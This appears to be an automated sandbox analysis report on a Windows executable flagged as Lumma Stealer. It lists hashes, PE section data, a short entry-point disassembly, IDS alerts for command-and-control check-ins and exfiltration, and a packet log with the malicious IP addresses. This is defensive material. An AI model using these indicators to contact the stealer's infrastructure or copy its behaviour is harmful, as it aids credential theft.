                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):464328
                                                                                                                                                                                                        Entropy (8bit):5.074669864961383
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                        MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                        SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                        SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                        SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                        Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:HMB:k
                                                                                                                                                                                                        MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                        SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                        SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                        SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                        Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):207935
                                                                                                                                                                                                        Entropy (8bit):5.420780972514107
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                        MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                        SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                        SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                        SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):7.947847211137937
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                        File size:1'849'856 bytes
                                                                                                                                                                                                        MD5:91042593292baba6ce50f767911859e1
                                                                                                                                                                                                        SHA1:796f59e5a82da5d08924cdf7f58940fca0a57fca
                                                                                                                                                                                                        SHA256:9bdd12b721e1b358cb1931a7261d31bd86f6d31eb059c0afbe4cb5e8f1d3be7f
                                                                                                                                                                                                        SHA512:537dda73f38f4e8989d9c707ec59892d80dbf19344593a6d31f79a55b672c8644f05387a71e93b17f6be81a53fa852a784d020f453f65aec2310ec484f30038d
                                                                                                                                                                                                        SSDEEP:49152:TE2nM4IXa72eYo7En72GMUpmeOBxjxbtNybKQMHS:jMcQnSfSOBxNoMHS
                                                                                                                                                                                                        TLSH:B585338F8F2D8AF5C5AFC7FB09D796462CC56374C666F63ACA99A73A072534F0420064
                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Lg.............................@I...........@..........................pI.....>.....@.................................\...p..
                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                        Entrypoint:0x894000
                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x674CEE8B [Sun Dec 1 23:17:31 2024 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        jmp 00007FF17CCF1A5Ah
                                                                                                                                                                                                        prefetchT2 byte ptr [eax+eax]
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        jmp 00007FF17CCF3A55h
                                                                                                                                                                                                        add byte ptr [edx+ecx], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add al, 0Ah
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], cl
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add al, 0Ah
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        push es
                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add al, 0Ah
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add al, 00h
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        and al, byte ptr [eax]
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4f05c0x70.idata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x1ac.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4f1f80x8.idata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        0x10000x4d0000x21e0072ff21fc68b25c569a54c11110fc9c7dFalse1.0003675622693726data7.9836752439029866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .rsrc0x4e0000x1ac0x200211bdf4be2ff1c51e48f3d41ed362637False0.583984375data4.574056308844375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .idata 0x4f0000x10000x20076384c610a15652eb9ef262cec63ccf7False0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        0x500000x2a50000x20028dc55dbc424a3b0424557e64bb06175unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        nxovzswj0x2f50000x19e0000x19de007c92f7b0f0591f482d10c9acdcdfed13False0.9949623414376322data7.954513868908687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        guodefnt0x4930000x10000x6004fcddc77ceee1cccd4f6da60aedcc065False0.5475260416666666data4.838300645627917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .taggant0x4940000x30000x22007ce74494d541d16b197dab9b15e67437False0.06192555147058824DOS executable (COM)0.771336214518364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_MANIFEST0x492bc00x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                        2024-12-02T07:37:27.586130+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:28.409863+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849705104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:28.409863+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:29.836272+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:30.651859+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849706104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:30.651859+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:32.299891+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:34.696223+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:37.581274+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:40.719722+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:41.483099+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849713104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:43.293582+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:51.942034+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849718104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:53.034206+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849718104.21.16.9443TCP
                                                                                                                                                                                                        2024-12-02T07:37:54.583004+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849719185.215.113.1680TCP
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Dec 2, 2024 07:37:16.996341944 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                        Dec 2, 2024 07:37:17.293236017 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                        Dec 2, 2024 07:37:22.183769941 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                        Dec 2, 2024 07:37:24.808768034 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.300510883 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.300554991 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.300642967 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.304183006 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.304202080 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.605720043 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.902542114 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.585896969 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.586129904 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.590590954 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.590603113 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.590907097 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.636857033 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.640552044 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.640611887 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:27.640659094 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.409861088 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.409950018 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.410003901 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.462724924 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.462743998 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.462758064 CET49705443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.462764978 CET44349705104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.577146053 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.577164888 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.577229023 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.577750921 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:28.577763081 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.570626020 CET4434970423.206.229.226192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.570811987 CET49704443192.168.2.823.206.229.226
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.836100101 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.836272001 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.837793112 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.837800026 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.838027000 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.839458942 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.839489937 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:29.839530945 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.651865005 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.651901007 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.651932955 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.651962996 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.652004957 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.652029037 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.652029037 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.652040005 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.652056932 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.652080059 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.660298109 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.660394907 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.660403013 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.668850899 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.668941021 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.668948889 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.714988947 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.714998960 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.761903048 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.853020906 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.857738018 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.857806921 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.857842922 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.857887983 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.858036995 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.858042955 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.858064890 CET49706443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.858068943 CET44349706104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.994256020 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.994303942 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.994436026 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.994839907 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:30.994858980 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.299737930 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.299890995 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.301506996 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.301517963 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.301841974 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.303409100 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.303575039 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:32.303617954 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.294753075 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.294850111 CET44349707104.21.16.9192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.294944048 CET49707443192.168.2.8104.21.16.9
                                                                                                                                                                                                        Dec 2, 2024 07:37:33.295265913 CET49707443192.168.2.8104.21.16.9
